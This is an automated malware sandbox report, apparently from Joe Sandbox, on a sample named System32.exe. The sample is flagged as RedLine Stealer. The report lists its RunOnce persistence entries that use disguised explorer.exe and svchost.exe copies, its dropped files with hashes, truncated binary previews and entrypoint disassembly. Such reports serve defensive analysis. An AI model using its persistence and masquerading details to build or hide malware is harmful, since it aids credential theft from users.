                                                                                                                                                                                                                                      Sample name:System32.exe
                                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                                      Classification:mal100.spre.troj.evad.winEXE@21/13@3/2
                                                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                                                      • Successful, ratio: 98%
                                                                                                                                                                                                                                      • Number of executed functions: 14
                                                                                                                                                                                                                                      • Number of non-executed functions: 1
                                                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                                                      • Found application associated with file extension: .exe

                                                                                                                                                                                                                                      Warnings

                                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtReadFile calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                                                                                                      Simulations

                                                                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                                                      02:27:35API Interceptor3641x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                                      02:27:35API Interceptor696x Sleep call for process: explorer.exe modified
                                                                                                                                                                                                                                      08:27:35AutostartRun: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Explorer c:\windows\resources\themes\explorer.exe RO
                                                                                                                                                                                                                                      08:27:44AutostartRun: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Svchost c:\windows\resources\svchost.exe RO

                                                                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                                                                      IPs

                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                      Domains

                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                      CELANESE-USJosho.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 159.223.216.80
                                                                                                                                                                                                                                      Josho.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 159.223.241.40
                                                                                                                                                                                                                                      boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                      • 159.223.89.97
                                                                                                                                                                                                                                      boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                      • 159.223.89.97
                                                                                                                                                                                                                                      boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                      • 159.223.89.97
                                                                                                                                                                                                                                      boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                      • 159.223.89.97
                                                                                                                                                                                                                                      boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                      • 159.223.89.97
                                                                                                                                                                                                                                      boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                      • 159.223.89.97
                                                                                                                                                                                                                                      boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                      • 159.223.89.97
                                                                                                                                                                                                                                      boatnet.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                      • 159.223.89.97

                                                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF1F538690B9927498.TMP

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\Resources\spoolsv.exe
                                                                                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5632
                                                                                                                                                                                                                                      Entropy (8bit):1.0150719828554693
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6:rl91bxbtg/Ul+CFQX4t9Xblt59Xh9XR5+1lf35X:rl3b/VFQ4bltD7Ovf5
                                                                                                                                                                                                                                      MD5:A60F0A1BF7CE8850DABABFEF91FE80E6
                                                                                                                                                                                                                                      SHA1:038FCFFB5BD124B023A1071AF7B51A27900B26E6
                                                                                                                                                                                                                                      SHA-256:321C0E9534E12F43C2E7664BBC66B891536A069CAE7D6FDD3E2BFF6E261DF7E1
                                                                                                                                                                                                                                      SHA-512:AC209A9C134F8515FDEAD638EB65FA28DF0B512A1EB0A266BB8988FC1D5A0C8D2395315EAFF10743BCE48A513FB23EA46D4916AE15005C826719DB38DA60DF6F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF379D375D360A30EE.TMP

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\Resources\svchost.exe
                                                                                                                                                                                                                                      File Type:Unknown
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):16384
                                                                                                                                                                                                                                      Entropy (8bit):0.4022769148265937
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//Fl/Fllfl/t+lFldRJ:rl912N0xs+CFQXCB9Xh9Xh9XUlf35X
                                                                                                                                                                                                                                      MD5:1E6AF6327736E3508F1C50506326C220
                                                                                                                                                                                                                                      SHA1:6115ED14E9AAF178029EA70716D76FECB1469C6C
                                                                                                                                                                                                                                      SHA-256:A941B5DA057560690B11153765184E0F92983148611048F3FDADA662054E0EFD
                                                                                                                                                                                                                                      SHA-512:88E4EF129E3CE63511AECC3FE2372C8B09B2A2A54AAE36A9E9C204B4A1CE513AEFC69BDF40C13542A7F3BF1B031C8683E6A191D3136F2FF7DE8D8CA2602B897B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF77290E3CE29A533B.TMP

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5632
                                                                                                                                                                                                                                      Entropy (8bit):1.014267770317653
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6:rl91bxbtg/Ul+CFQX2Gt9Xblt59Xh9XR5+1lf35X:rl3b/VFQ2WbltD7Ovf5
                                                                                                                                                                                                                                      MD5:EDEB8BB1D7F35E1DB1307B0B156463F4
                                                                                                                                                                                                                                      SHA1:2D1842AFA1BC7E093C869636580451340DF2C4E3
                                                                                                                                                                                                                                      SHA-256:2CE863B13C765360B774C5846DCAB7348EDA69F9E8CACC0CB40C76E4D3E970C4
                                                                                                                                                                                                                                      SHA-512:DF91AF39246234CB452FA002F2D441E4CA9B84CDCF378353CD66FF070C48CBF7D401F0E6899ABAB3FE1D3CA3C52B9F18B8042E20F22611F1A36989384560C080
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DFA685D8847E3D4BFD.TMP

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\Resources\Themes\icsys.icn.exe
                                                                                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5632
                                                                                                                                                                                                                                      Entropy (8bit):1.015427096491833
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6:rl91bxbtg/Ul+CFQXNt9Xblt59Xh9XR5+1lf35X:rl3b/VFQlbltD7Ovf5
                                                                                                                                                                                                                                      MD5:F66EE69DB7C3BCD713485E7027BA663E
                                                                                                                                                                                                                                      SHA1:EB4E8F13C0BE1A16F05E216E2137DF49E4A34635
                                                                                                                                                                                                                                      SHA-256:D3B811855E9F261A946D5D7AABEB25811621E59374B3B598839FAF5A4A988922
                                                                                                                                                                                                                                      SHA-512:7643085863B8DCDA74E217DB375097CAE96650E01D3A6B32352C9FDB9826B99EF1A0F2E0CC2978BA01531A31BDAF42EFC48984C4CA02FFEFB63F5873A3334813
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DFB3C6E02F9A132290.TMP

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\Resources\svchost.exe
                                                                                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5632
                                                                                                                                                                                                                                      Entropy (8bit):1.0145828337961365
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6:rl91bxbtg/Ul+CFQXt0Gt9Xblt59Xh9XR5+1lf35X:rl3b/VFQtXbltD7Ovf5
                                                                                                                                                                                                                                      MD5:6E5CC331B2E345FFC449F3CDDDD6F1F2
                                                                                                                                                                                                                                      SHA1:F84EFD27E1CBB4CCF522665B87374EE19D91FA2F
                                                                                                                                                                                                                                      SHA-256:4C0B78482EBEAD1066D889310CBFB831736FE77BBC977C50B9E799D49202D87E
                                                                                                                                                                                                                                      SHA-512:84A44722EDF99D4E935ADF17BE858E68E1A2D546560D5E13B34A455CAAA79B4D60FD1EA097130C5D8BFF6610EB683D121EAE1D0861D744BE99BC6005D8F198BA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DFB6665125848BDF72.TMP

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\Resources\spoolsv.exe
                                                                                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5632
                                                                                                                                                                                                                                      Entropy (8bit):1.015427096491833
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6:rl91bxbtg/Ul+CFQX0ft9Xblt59Xh9XR5+1lf35X:rl3b/VFQ0nbltD7Ovf5
                                                                                                                                                                                                                                      MD5:8C3F0A222DE93ECD6B29B5AB86A1B78C
                                                                                                                                                                                                                                      SHA1:2A5DE557E92FCB6335F793493B0DD2488AF38F98
                                                                                                                                                                                                                                      SHA-256:B460D3D54CD41A5A98538510D35C3EC94DF5CB693B53E33A8F12E7148F184E5C
                                                                                                                                                                                                                                      SHA-512:074713E85EA2743B3BC80D7BCFF3590C6430B965546CC0CD0C5957E2CC65B8B34A55E1BFB1F138B6C9A5EC027D2D589630A308427697E6A1D569DB335A32F5F8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DFCAFAA8C76DBBE408.TMP

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):16384
                                                                                                                                                                                                                                      Entropy (8bit):0.4022769148265937
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//Fl/Fllfl/t+lFldRJ:rl912N0xs+CFQXCB9Xh9Xh9XUlf35X
                                                                                                                                                                                                                                      MD5:1E6AF6327736E3508F1C50506326C220
                                                                                                                                                                                                                                      SHA1:6115ED14E9AAF178029EA70716D76FECB1469C6C
                                                                                                                                                                                                                                      SHA-256:A941B5DA057560690B11153765184E0F92983148611048F3FDADA662054E0EFD
                                                                                                                                                                                                                                      SHA-512:88E4EF129E3CE63511AECC3FE2372C8B09B2A2A54AAE36A9E9C204B4A1CE513AEFC69BDF40C13542A7F3BF1B031C8683E6A191D3136F2FF7DE8D8CA2602B897B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DFFF7356C5D947597E.TMP

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\System32.exe
                                                                                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5632
                                                                                                                                                                                                                                      Entropy (8bit):1.0147168692191055
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6:rl91bxbtg/Ul+CFQXhJt9Xblt59Xh9XR5+1lf35X:rl3b/VFQfbltD7Ovf5
                                                                                                                                                                                                                                      MD5:862F6EF1A04FC83C05E40BE9F57D1E6C
                                                                                                                                                                                                                                      SHA1:805C028AF8410B61DB588AF2E4366CD1130ACACC
                                                                                                                                                                                                                                      SHA-256:CA9B860D2C0BCBC1DE2486262410CE93A4F1DC3E2FB8A3C0A0A35DFA037B37E8
                                                                                                                                                                                                                                      SHA-512:3C2257B20D7D3C65C5B75ECD165DC267B17DAC6F3AC9C7A7FD7818E141B14DF60BE74C242A3A4170746AEC5CF81D15F9F8A38568BEDD2049B21D37E96270E447
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\Desktop\system32.exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\System32.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):307712
                                                                                                                                                                                                                                      Entropy (8bit):5.081284419332324
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:acZqf7D34Tp/0+mA0kywMlQEg85fB1fA0PuTVAtkxzoQ3RMeqiOL2bBOA:acZqf7DItnGCQNB1fA0GTV8kmg0L
                                                                                                                                                                                                                                      MD5:C368CB0E4CC65CBDC012E449DE37D973
                                                                                                                                                                                                                                      SHA1:AE04D634FF3078E1912DC71D44C893C1DD47C399
                                                                                                                                                                                                                                      SHA-256:57A8157689ACAB60874B086408091B4369F3F5F9D62BCC306C9E77FF9F3C5B7E
                                                                                                                                                                                                                                      SHA-512:E823A91EE1F8901EBC844D16ED1C585BD78FCF6FA143433649C1295F3724DDD29679949EC7B97485505B259E4CE7D012948F971451F0BDE6B525CC915E3ED18A
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\Desktop\system32.exe , Author: Joe Security
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 68%, Browse
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H(...............0.................. ... ....@.. ....................... ............@.................................<...O.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B................p.......H....... ...............(w..............................................a.u.t.o.f.i.l.l.5.t.Y.W.R.q.a.W.V.o.a.m.h.h.a.m.J.8.W.W.9.y.b.2.l.X.Y.W.x.s.Z.X.Q.K.a.W.J.u.Z.W.p.k.Z.m.p.t.b.W.t.w.Y.2.5.s.c.G.V.i.a.2.x.t.b.m.t.v.Z.W.9.p.a.G.9.m.Z.W.N.8.V.H.J.v.b.m.x.p.b.m.s.K.a.m.J.k.Y.W.9.j.b.m.V.p.a.W.l.u.b.W.p.i.a.m.x.n.Y.W.x.o.Y.2.V.s.Z.2.J.l.a.m.1.u.a.W.R.8.T.m.l.m.d.H.l.X.Y.W.x.s.Z.X.Q.K.b.m.t.i.a.W.h.m.Y.m.V.v.Z.2.F.l.Y.W.9.l.a.G.x.l.Z.m.5.r.b.2.R.i.Z.W.Z.n.c.G.d.r.b.m.5.8.T.W.

                                                                                                                                                                                                                                      C:\Windows\Resources\Themes\explorer.exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\Resources\Themes\icsys.icn.exe
                                                                                                                                                                                                                                      File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5859063
                                                                                                                                                                                                                                      Entropy (8bit):7.923836642974431
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:98304:euP+GgrLRHeOxxsJFoQYVCkOTfOKfKQMZ8htPwCakmxrcTZcVs:l+GgLRJghYckmmKfFMZqtMkicZcVs
                                                                                                                                                                                                                                      MD5:805C1BF19E32C7B484F3555C6A3BE527
                                                                                                                                                                                                                                      SHA1:0EF9603F5106EC5DB0BC3E8004D50072DFE4AB84
                                                                                                                                                                                                                                      SHA-256:6A7077CF5345AF04FA18D40DAA346368A875167F8CBD5C3434410E890A20E5DB
                                                                                                                                                                                                                                      SHA-512:F47F723D08BEAD6F6F4D4ED1AEC2696731300E2AE786A126636AE4E30B010FB7B18AB465D6833FE3EF0057412A0BF98C985F8855E0139ED737246CF897617065
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0......X.o...........@.......................... .......T.....................................H...P................................................................................................................... ........................... ... ............................@... ..........................5.@....idata..............................@....rsrc.... ....... ..................@..@.themida.`m.. ......................`....boot.....N...o...N.................`..`................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Windows\Resources\Themes\icsys.icn.exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\System32.exe
                                                                                                                                                                                                                                      File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5229747
                                                                                                                                                                                                                                      Entropy (8bit):7.919073893926981
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:98304:euP+GgrLRHeOxxsJFoQYVCkOTfOKfKQMZ8htPwCakmxrcTZcVi:l+GgLRJghYckmmKfFMZqtMkicZcVi
                                                                                                                                                                                                                                      MD5:6A696257BD624EA0CDDE713FF447B134
                                                                                                                                                                                                                                      SHA1:FA17806195D1FB5A2077A7D43827F58832D57C35
                                                                                                                                                                                                                                      SHA-256:C2234864D3687F6EB397FC0FE4C81D2C54DBCF74161AB38B48A1150DF753C573
                                                                                                                                                                                                                                      SHA-512:B49AC9B20AB4F1C8B7793F1C007EE7985F9C11C0C5C67CF99436F22275EFCA504A20480A0D6CF52C793060EB78F090A66D33A5F37BFFE678591B16A55D7D94AE
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0......X.o...........@.......................... .......T.....................................H...P................................................................................................................... ........................... ... ............................@... ..........................5.@....idata..............................@....rsrc.... ....... ..................@..@.themida.`m.. ......................`....boot.....N...o...N.................`..`................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Windows\Resources\spoolsv.exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5858917
                                                                                                                                                                                                                                      Entropy (8bit):7.926453872107669
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:98304:euP+GgrLRHeOxxsJFoQYVCkOTfOKfKQMZ8htPwCakmxrcTZcVm:l+GgLRJghYckmmKfFMZqtMkicZcVm
                                                                                                                                                                                                                                      MD5:08CFDA44CEE577DA294331E5F9615605
                                                                                                                                                                                                                                      SHA1:E5F64C54D0BF77A941DCCCBED0CADE28E19F5BC0
                                                                                                                                                                                                                                      SHA-256:F074E4029D15BF28FFA6FC4E6D436360428317B4A1295061A0DC5A9733FEE1B4
                                                                                                                                                                                                                                      SHA-512:C1A5A7D3BFF06C34305D6659CBC83879EA5BD4E5026284F135E1E76D770323A0942B6930612E4970506037CC35A0F49E61E040062031E950DA9840250DCD47B9
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0......X.o...........@.......................... .......T.....................................H...P................................................................................................................... ........................... ... ............................@... ..........................5.@....idata..............................@....rsrc.... ....... ..................@..@.themida.`m.. ......................`....boot.....N...o...N.................`..`................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Windows\Resources\svchost.exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\Resources\spoolsv.exe
                                                                                                                                                                                                                                      File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5858879
                                                                                                                                                                                                                                      Entropy (8bit):7.922900773703205
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:98304:euP+GgrLRHeOxxsJFoQYVCkOTfOKfKQMZ8htPwCakmxrcTZcV5:l+GgLRJghYckmmKfFMZqtMkicZcV5
                                                                                                                                                                                                                                      MD5:A2D31781CBA01F1BCB14F06D4CF851BD
                                                                                                                                                                                                                                      SHA1:96361626F246C530C8155DCB2A0818116DAC59BD
                                                                                                                                                                                                                                      SHA-256:92273C3178D3E77E623464D22F5A1098651D14AB3D80C2D315D8780E0667B782
                                                                                                                                                                                                                                      SHA-512:A434CEDC5FA7E69B0E6BF3D8F6081D456DFE94FCBBC03E74157D7F24A8E7990862EC50992D405274B53E0ED5FA7FCFE2BD273EA815E8D33D0180B2E6EAD311C8
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0......X.o...........@.......................... .......T.....................................H...P................................................................................................................... ........................... ... ............................@... ..........................5.@....idata..............................@....rsrc.... ....... ..................@..@.themida.`m.. ......................`....boot.....N...o...N.................`..`................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      File type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
                                                                                                                                                                                                                                      Entropy (8bit):7.838102061716677
                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                      File name:System32.exe
                                                                                                                                                                                                                                      File size:5'537'484 bytes
                                                                                                                                                                                                                                      MD5:d4817ea043beaf35d19fa6a5adaa179c
                                                                                                                                                                                                                                      SHA1:bf5c75100142731e737c04b55769c4479bef0c01
                                                                                                                                                                                                                                      SHA256:da5844b02ebfa56b4c036ea50136e7766922fa1591d344130f5492e5624fdf5d
                                                                                                                                                                                                                                      SHA512:98d2f67523de2260cad45ce2b3f0e6edd5322ad4d2d78854983c3410398079f1a0dd3f8b3dc69d3e0f052c566de3eb89d1de9a086378f542b1a2096ce0730277
                                                                                                                                                                                                                                      SSDEEP:98304:euP+GgrLRHeOxxsJFoQYVCkOTfOKfKQMZ8htPwCakmxrcTZcV+TQB:l+GgLRJghYckmmKfFMZqtMkicZcV2e
                                                                                                                                                                                                                                      TLSH:C44633A827548951DEBE0B7A9872CB7043F4FD43C9D0872B99C88DDB3D35BA0C255B62
                                                                                                                                                                                                                                      File Content Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0......X.o...........@................

                                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                                      Icon Hash:4d9ea39484a28e0f

                                                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Entrypoint:0xaf8058
                                                                                                                                                                                                                                      Entrypoint Section:.boot
                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                                                      DLL Characteristics:
                                                                                                                                                                                                                                      Time Stamp:0x51593266 [Mon Apr 1 07:08:22 2013 UTC]
                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                      OS Version Major:4
                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                      File Version Major:4
                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                      Import Hash:b672bf4528e2ef8904397d0b17905606

                                                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                      call 00007F7AC10E6020h
                                                                                                                                                                                                                                      push ebx
                                                                                                                                                                                                                                      mov ebx, esp
                                                                                                                                                                                                                                      push ebx
                                                                                                                                                                                                                                      mov esi, dword ptr [ebx+08h]
                                                                                                                                                                                                                                      mov edi, dword ptr [ebx+10h]
                                                                                                                                                                                                                                      cld
                                                                                                                                                                                                                                      mov dl, 80h
                                                                                                                                                                                                                                      mov al, byte ptr [esi]
                                                                                                                                                                                                                                      inc esi
                                                                                                                                                                                                                                      mov byte ptr [edi], al
